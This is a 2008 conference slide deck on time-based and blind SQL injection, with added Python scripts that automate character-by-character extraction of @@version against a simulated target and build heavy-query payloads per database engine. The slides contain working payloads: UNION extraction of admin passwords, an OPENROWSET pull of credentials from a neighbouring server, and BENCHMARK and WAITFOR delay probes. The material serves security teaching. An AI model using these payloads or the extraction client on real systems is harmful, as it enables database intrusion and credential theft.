Time based SQL Injection


Page 1: Time based SQL Injection

© 2008 Security-Assessment.com

Time based SQL Injection

Presented by Muhaimin Dzulfakar

Page 2: Time based SQL Injection

Who am I

Muhaimin Dzulfakar – 90% of kiwis can't pronounce it

Known as 'Emmie'

Security Consultant – Security-Assessment.com

Application and network pen-tester

Page 3: Time based SQL Injection

Agenda

What is time based SQL Injection

Differences between blind and time based SQL Injection

Time based injection with heavy queries

Limitations of time based SQL Injection

Page 4: Time based SQL Injection

Different types of SQL Injection

In Band Injection

Out of Band Injection

Blind SQL Injection

Time Based SQL Injection

Page 5: Time based SQL Injection

In Band Injection

Results come back in the same channel as the application's normal response, e.g. embedded in the page via UNION SELECT

Also useful when the SQL error message is displayed (error-based injection)

Fastest way to extract data

Ex: http://www.buyviagra.com/buy.php?id=1 UNION ALL SELECT null, null, null, null, concat(username,0x3a,admin_password), null from admin/*

Page 6: Time based SQL Injection

In Band Injection

Page 7: Time based SQL Injection

Out of Band Injection

Use a different communication channel to retrieve the data

Ex: web mail application in which data received via SMTP is processed

Example of attack: accessing your neighbour's database server with OOB injection (MSSQL, via OPENROWSET to a second server)

Ex: http://www.buyviagra.com/buy.asp?id=1 UNION ALL SELECT a.* FROM OPENROWSET('SQLOLEDB','uid=sa;pwd=;Network=DBMSSOCN;Address=10.1.1.1;timeout=1','SELECT user, pass FROM users') AS a--

Page 8: Time based SQL Injection

Out of Band Injection

[Diagram: OOB injection from the web server www.buyviagra.com through Database A to the neighbouring Database B at 10.1.1.1]

Page 9: Time based SQL Injection

Blind SQL Injection

Application generates a custom error message for a failed (false) response and the normal page for a successful (true) response

Compare the true response with the false response:

AND 1=1 -> true
AND 1=2 -> false

Read data byte by byte, each byte through a series of true/false comparisons

Page 10: Time based SQL Injection

Blind SQL Injection

Page 11: Time based SQL Injection

Blind SQL Injection

Page 12: Time based SQL Injection

Time Based SQL Injection

Use the response time to distinguish a true condition from a false one

For a true condition – the time delay is executed

For a false condition – the time delay is not executed

Read data byte by byte – exactly the same method as blind injection, with the delay replacing the visible difference in the page

First example in Chris Anley's paper – (more) Advanced SQL Injection (2002)

Another example is in David Litchfield's paper – Data-mining with SQL Injection and Inference (2005)

Page 13: Time based SQL Injection

Why we need Time Based SQL Injection

When the application generates the default page for both the true and the false response

When the application generates the same custom error page for both the true and the false response

The injection is successful, but the result can't be seen by the attacker

Page 14: Time based SQL Injection

Scenario 1 (blind injection attack)

$default=1
if value is not between 1-20
{
    redirect user to page.php?id=$default
}

SQL statement
1 AND 1=1 [TRUE]  -> default page displayed
1 AND 1=2 [FALSE] -> default page displayed

BLIND INJECTION FAILED

Page 15: Time based SQL Injection

Scenario 1 (time based blind injection attack)

$default=1
if value is not between 1-20
{
    redirect user to page.php?id=$default
}

SQL statement
1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond

TIME BASED BLIND INJECTION SUCCESS

Page 16: Time based SQL Injection

Scenario 2 (blind injection attack)

$values = 1 to 20
if the $values are not between 1-20
{
    redirect user to error.php
}

SQL statement
1 AND 1=1 [TRUE]  -> error page displayed
1 AND 1=2 [FALSE] -> error page displayed

BLIND INJECTION FAILED

Page 17: Time based SQL Injection

Scenario 2 (time based blind injection attack)

$values = 1 to 20
if the $values are not between 1-20
{
    redirect user to error.php
}

SQL statement
1 AND 1=1 [TRUE]  -> takes 5 seconds to respond
1 AND 1=2 [FALSE] -> takes 1 second to respond

TIME BASED BLIND INJECTION SUCCESS

Page 18: Time based SQL Injection

Time Based SQL Injection

Screenshot: TRUE = 2478 ms, FALSE = 117 ms

Page 19: Time based SQL Injection

Spot the difference

Blind injection (for MySQL)

1 AND ASCII(substring((@@version),1,1))<52

Parts: query = @@version, position = 1, operator = <, char = 52 (the ASCII code of '4')

If the first character of the database version is less than '4', the condition is true

If the first character of the database version is '4' or more, the condition is false

Page 20: Time based SQL Injection

Spot the difference

Time Based Blind injection (for MySQL)

1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),1,1)),0)<52),BENCHMARK(900000,SHA1(1)),1))

Parts: query = @@version, position = 1, operator = <, char = 52, time delay = BENCHMARK(900000,SHA1(1)), count time = the response time measured by the attacker

If the first character of the database version is less than '4', BENCHMARK is executed (slow response)

If the first character of the database version is not less than '4', 1 is returned immediately (fast response)

IFNULL turns the NULL returned for a position past the end of the string into 0, so the comparison stays well defined and the attacker can detect the end of the value

Caveat: BENCHMARK burns CPU, so the delay it produces depends on server speed and load; MySQL 5.0.12 and later also provide SLEEP(seconds), which gives a fixed delay

Page 21: Time based SQL Injection

Time Based Injection on MSSQL

Time based injection (MSSQL)

1; IF NOT (ASCII(SUBSTRING((SELECT @@version),25,1)) < 52) WAITFOR DELAY '0:0:9'--

Parts: query = @@version, position = 25, operator = <, char = 52, time delay = WAITFOR DELAY '0:0:9'

Because of the NOT, the 9 second delay is executed when the character at position 25 of @@version is not less than '4'; otherwise the query returns immediately

IF ... WAITFOR is a separate statement, so it is stacked after the original query with ';' rather than joined to it with AND
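The MySQL and MSSQL probes on the last three slides each answer one yes/no question about one character; recovering a value means asking such questions in a loop and timing every answer. The Python script below is an added example, not code from the slides: it builds the slides' two payload shapes for a given position and threshold, calibrates a timing cutoff from a known-false and a known-true probe (the time based counterpart of AND 1=2 / AND 1=1), and then binary-searches each character of @@version, seven probes per character, stopping when the IFNULL/ISNULL past-the-end probe yields 0. Against a real target send() would be an HTTP request; here the target is a constructed in-process simulation that sleeps when the comparison is true, so the script runs offline. The MSSQL payload is written as a stacked IF ... WAITFOR that delays when the comparison is true (the slide's version delays on the negated test); the 0.05 s simulated delay, max_len and the version string "5.0.51a" are assumptions.

```python
import re
import time
from typing import Callable

# Added example, not code from the slides. The payload builders follow slides 20
# and 21; everything from make_simulated_target() down is a constructed stand-in
# for the vulnerable application so the client can run offline.

DELAY_SECONDS = 0.05   # assumed delay of the simulated target (real delays: seconds)

Sender = Callable[[str], None]          # delivers one payload (an HTTP request in practice)
PayloadBuilder = Callable[[int, int], str]


def mysql_payload(position: int, threshold: int, iterations: int = 900000) -> str:
    """Slide 20's MySQL probe: BENCHMARK() burns CPU when
    ASCII(SUBSTRING(@@version, position, 1)) < threshold. IFNULL turns the NULL
    returned past the end of the string into 0, which the client treats as the end."""
    return ("1 AND (SELECT IF((IFNULL(ASCII(SUBSTRING((SELECT @@version),%d,1)),0)<%d),"
            "BENCHMARK(%d,SHA1(1)),1))" % (position, threshold, iterations))


def mssql_payload(position: int, threshold: int, seconds: int = 9) -> str:
    """Slide 21's MSSQL probe as a stacked statement that delays when the comparison
    is true (the slide delays on the negated test); ISNULL plays IFNULL's role."""
    return ("1; IF (ISNULL(ASCII(SUBSTRING((SELECT @@version),%d,1)),0) < %d) "
            "WAITFOR DELAY '0:0:%d'--" % (position, threshold, seconds))


def timed(send: Sender, payload: str) -> float:
    """Response time of one probe: the only signal the attacker gets."""
    start = time.perf_counter()
    send(payload)
    return time.perf_counter() - start


def calibrate(send: Sender, build: PayloadBuilder, samples: int = 3) -> float:
    """Decision cutoff halfway between the slowest known-false probe (ASCII < 0 never
    holds) and the fastest known-true probe (ASCII < 128 holds for any ASCII char)."""
    slowest_false = max(timed(send, build(1, 0)) for _ in range(samples))
    fastest_true = min(timed(send, build(1, 128)) for _ in range(samples))
    if fastest_true <= slowest_false:
        raise RuntimeError("no usable timing gap; target too busy or not vulnerable")
    return (slowest_false + fastest_true) / 2


def extract_char(send: Sender, build: PayloadBuilder, position: int, cutoff: float) -> int:
    """Binary search over ASCII 0..127: seven timed probes per character rather than
    one probe per candidate value. Invariant: lo <= code < hi."""
    lo, hi = 0, 128
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if timed(send, build(position, mid)) >= cutoff:   # slow response: code < mid
            hi = mid
        else:                                             # fast response: code >= mid
            lo = mid
    return lo


def extract_string(send: Sender, build: PayloadBuilder, max_len: int = 64) -> str:
    """Read @@version character by character until the past-the-end probe yields 0."""
    cutoff = calibrate(send, build)
    chars = []
    for position in range(1, max_len + 1):
        code = extract_char(send, build, position, cutoff)
        if code == 0:
            break
        chars.append(chr(code))
    return "".join(chars)


# Constructed simulated target: recovers position and threshold from either payload
# shape, compares against an assumed @@version string and sleeps when that is true.
_PROBE = re.compile(r"@@version\),(\d+),1\)\),0\)\s*<\s*(\d+)")


def make_simulated_target(version: str, delay: float = DELAY_SECONDS) -> Sender:
    def send(payload: str) -> None:
        match = _PROBE.search(payload)
        if match is None:
            return                                        # unrecognised probe: no delay
        position, threshold = int(match.group(1)), int(match.group(2))
        code = ord(version[position - 1]) if position <= len(version) else 0
        if code < threshold:
            time.sleep(delay)
    return send


if __name__ == "__main__":
    target = make_simulated_target("5.0.51a")             # assumed version string
    print("probe for position 1:", mysql_payload(1, 52))
    print("recovered @@version:", extract_string(target, mysql_payload))
```

The calibration step is what makes the result usable on a busy server: rather than a fixed cutoff, it takes the worst observed false time and the best observed true time, and refuses to run when they overlap, which is the failure mode the Limitations slide describes.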

Page 22: Time based SQL Injection

Other Databases

Oracle (without PL/SQL support), MS Access and DB2 do not have delay functions

Time Based Injection is still possible by using heavy queries

Chema Alonso and Jose Parada talked about this in a Microsoft Security MVP article and at Defcon 2008

A 'where clause' combines a light (cheap) condition and a heavy (expensive) condition with AND; because of short-circuit evaluation the second condition is only evaluated when the first is true, so the response time depends on which one is evaluated first:

Light condition first

Heavy condition first

SELECT A FROM B WHERE ConditionA AND ConditionB

Page 23: Time based SQL Injection

Heavy condition first

Result from Alonso's research (heavy condition = 100 sec, light condition = 10 sec):

Heavy    Light    Result    Time
False    -        False     100 seconds (light condition never evaluated)
True     True     True      110 seconds
True     False    False     110 seconds

Page 24: Time based SQL Injection

Light condition first

Result from Alonso's research (light condition = 10 sec, heavy condition = 100 sec):

Light    Heavy    Result    Time
False    -        False     10 seconds (heavy condition never evaluated)
True     True     True      110 seconds
True     False    False     110 seconds

Only when the light condition is evaluated first does its truth value change the response time (10 vs 110 seconds); with the heavy condition first the response takes 100 seconds or more either way, so the inference test must sit in the light condition and be evaluated before the heavy query

Page 25: Time based SQL Injection

Heavy Queries

Oracle evaluates the conditions from left to right

MS Access evaluates the conditions from right to left

MSSQL evaluates the light condition first, whichever side it is written on

Table name needs to be known (the heavy query is a table cross-joined with itself)

Default tables can be used for testing:

MSSQL – sysusers

MySQL – information_schema.columns

Oracle – all_users

Page 26: Time based SQL Injection

Heavy Queries

Example of time based injection using heavy queries on MSSQL (light condition evaluates first):

1 AND (select count(*) FROM sysusers as sys1, sysusers as sys2, sysusers as sys3, sysusers as sys4, sysusers as sys5, sysusers as sys6, sysusers as sys7, sysusers as sys8) > 0 AND 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers)

heavy query: the eight-way cross join of sysusers, always true but slow to count

light query: 52 < (select top 1 ASCII(substring(name,1,1)) from sysusers), the inference test; when it is false the heavy query is skipped and the response is fast

Suitable for databases that do not support time delay functions

Ex: Oracle and MS Access
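Pages 22 to 26 give the evaluation order of three engines, two timing tables and one MSSQL payload. The Python below is an added example, not code from the slides or from Alonso and Parada's work: it models the short-circuit AND timing behind the two tables, derives from it the number of seconds separating a true from a false inference test on each engine (zero when the test is placed on the wrong side), and builds the corresponding heavy-query payload with the light test placed where that engine evaluates it first. The Oracle dialect (all_users, SUBSTR, ROWNUM) follows the table list on page 25; the MS Access table MSysObjects with its Name column and Jet's Asc()/Mid() functions are assumptions, since the slides name no Access table; the 100 and 10 second costs are the figures from the slides.

```python
# Added example, not from the slides or from Alonso and Parada's work. Models the
# short-circuit timing tables on pages 23-24 and builds heavy-query payloads with
# the inference test placed where each engine evaluates it first.

HEAVY_COST = 100   # seconds, figures from the slides
LIGHT_COST = 10

# Evaluation order of WHERE conditions per engine, as stated on page 25.
EVAL_ORDER = {"mssql": "cheapest-first", "oracle": "left-to-right", "access": "right-to-left"}

# System table for the heavy self-join (page 25) and the light inference test.
# The Access entries (MSysObjects, Asc(), Mid()) are assumptions: the slides name none.
HEAVY_TABLE = {"mssql": "sysusers", "oracle": "all_users", "access": "MSysObjects"}
LIGHT_TEST = {
    "mssql": "%d < (SELECT TOP 1 ASCII(SUBSTRING(name,%d,1)) FROM sysusers)",
    "oracle": "%d < (SELECT ASCII(SUBSTR(username,%d,1)) FROM all_users WHERE ROWNUM = 1)",
    "access": "%d < (SELECT TOP 1 Asc(Mid(Name,%d,1)) FROM MSysObjects)",
}


def heavy_condition(dbms: str, width: int = 8) -> str:
    """Cross join of a system table with itself `width` times. Always true, but the
    row count is rows**width, so counting it takes seconds to minutes. Aliases are
    written without AS because Oracle rejects AS on table aliases."""
    joins = ", ".join("%s s%d" % (HEAVY_TABLE[dbms], i) for i in range(1, width + 1))
    return "(SELECT COUNT(*) FROM %s) > 0" % joins


def light_condition(dbms: str, position: int, threshold: int) -> str:
    """Cheap inference test in the slide's form: threshold < ASCII(char at position)."""
    return LIGHT_TEST[dbms] % (threshold, position)


def light_goes_first_in_where(dbms: str) -> bool:
    """Put the light test on the side the engine evaluates first: left for a
    left-to-right engine, right for a right-to-left one. MSSQL picks the cheap
    condition itself, so the slide's order (heavy, light) is kept."""
    return EVAL_ORDER[dbms] == "left-to-right"


def heavy_query_payload(dbms: str, position: int, threshold: int) -> str:
    light, heavy = light_condition(dbms, position, threshold), heavy_condition(dbms)
    conds = [light, heavy] if light_goes_first_in_where(dbms) else [heavy, light]
    return "1 AND " + " AND ".join(conds)


def evaluate_where(conditions, order: str):
    """Short-circuit AND over (is_true, cost) pairs written in WHERE order but
    evaluated in the engine's order. Returns (result, seconds)."""
    if order == "right-to-left":
        sequence = list(reversed(conditions))
    elif order == "cheapest-first":
        sequence = sorted(conditions, key=lambda c: c[1])
    else:
        sequence = list(conditions)
    seconds = 0
    for is_true, cost in sequence:
        seconds += cost
        if not is_true:
            return False, seconds
    return True, seconds


def alonso_table(light_first: bool):
    """Rows (first, second, result, seconds) of the page 23 (heavy first) or page 24
    (light first) table; second is None when short-circuiting skipped it."""
    costs = (LIGHT_COST, HEAVY_COST) if light_first else (HEAVY_COST, LIGHT_COST)
    rows = []
    for first, second in [(False, None), (True, True), (True, False)]:
        pairs = [(first, costs[0]), (bool(second), costs[1])]
        result, seconds = evaluate_where(pairs, "left-to-right")
        rows.append((first, second, result, seconds))
    return rows


def timing_gap(dbms: str, light_first_in_where=None) -> int:
    """Seconds separating a true from a false inference test on this engine, with the
    heavy query always true. 0 means the placement gives no usable oracle."""
    if light_first_in_where is None:
        light_first_in_where = light_goes_first_in_where(dbms)

    def seconds(light_true: bool) -> int:
        light, heavy = (light_true, LIGHT_COST), (True, HEAVY_COST)
        placed = [light, heavy] if light_first_in_where else [heavy, light]
        return evaluate_where(placed, EVAL_ORDER[dbms])[1]

    return seconds(True) - seconds(False)


if __name__ == "__main__":
    for dbms in EVAL_ORDER:
        print(dbms, "gap:", timing_gap(dbms), "s", "payload:", heavy_query_payload(dbms, 1, 52))
    print("oracle with the light test on the right:", timing_gap("oracle", False), "s")
```

timing_gap() with the second argument forced shows the failure mode: on Oracle a payload written heavy-then-light, or on Access one written light-then-heavy, pays the 100 second heavy query on every probe and gives a gap of 0, so nothing can be inferred no matter how long the attacker waits.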

Page 27: Time based SQL Injection

Limitations

Results are unreliable when the server is busy (response time jitter can hide the delay or imitate it)

How to get reliable results?

Check how busy the host is first, e.g. by reviewing its IP ID behaviour with hping3

Perform the test at 3am

Perform the test during Xmas

For heavy queries, the time delay depends on how much data is stored in the database

The more data, the more reliable the result

Page 28: Time based SQL Injection

Demo

Page 29: Time based SQL Injection

Questions?

[email protected]